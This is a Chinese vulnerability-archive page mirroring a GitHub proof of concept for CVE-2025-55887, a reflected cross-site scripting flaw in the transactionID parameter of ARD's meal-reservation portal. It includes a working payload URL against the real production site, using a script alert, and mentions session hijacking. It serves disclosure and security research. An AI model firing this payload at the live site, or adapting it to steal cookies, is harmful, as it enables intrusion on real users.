POC详情: fad95608b3c576e4b1aad2c279d400913cc34845

来源
https://github.com/0xZeroSec/CVE-2025-55887
关联漏洞
标题: ARD GEC en Ligne 安全漏洞 (CVE-2025-55887)
描述:ARD GEC en Ligne是法国ARD公司的一个线上服务门户网站。 ARD GEC en Ligne存在安全漏洞,该漏洞源于对transactionID参数输入验证和输出编码不足,可能导致跨站脚本攻击。
介绍
# CVE-2025-55887
### Description
Cross-Site Scripting (XSS) vulnerability was discovered in the meal
reservation service ARD. The vulnerability exists in the transactionID
GET parameter on the transaction confirmation page. Due to improper
input validation and output encoding, an attacker can inject malicious
JavaScript code that is executed in the context of a user s browser.
This can lead to session hijacking, theft of cookies, and other
malicious actions performed on behalf of the victim.

### Proof Of Concept

**Payload**
```
https://services.ard.fr/index.php?id=5869&ocid=183&token=1SemPugSUq3maSpK81871559797854161&transactionID=<script>alert(/OPENBUGBOUNTY/)</script>
```

**Screenshot of vulnerability**
![Screenshot of vulnerability](https://www.openbugbounty.org/twimages/screen-4024708.jpg)

### Reseachers
- [raphckrman](https://github.com/raphckrman)
文件快照

 [4.0K]  /data/pocs/fad95608b3c576e4b1aad2c279d400913cc34845
└── [ 870]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。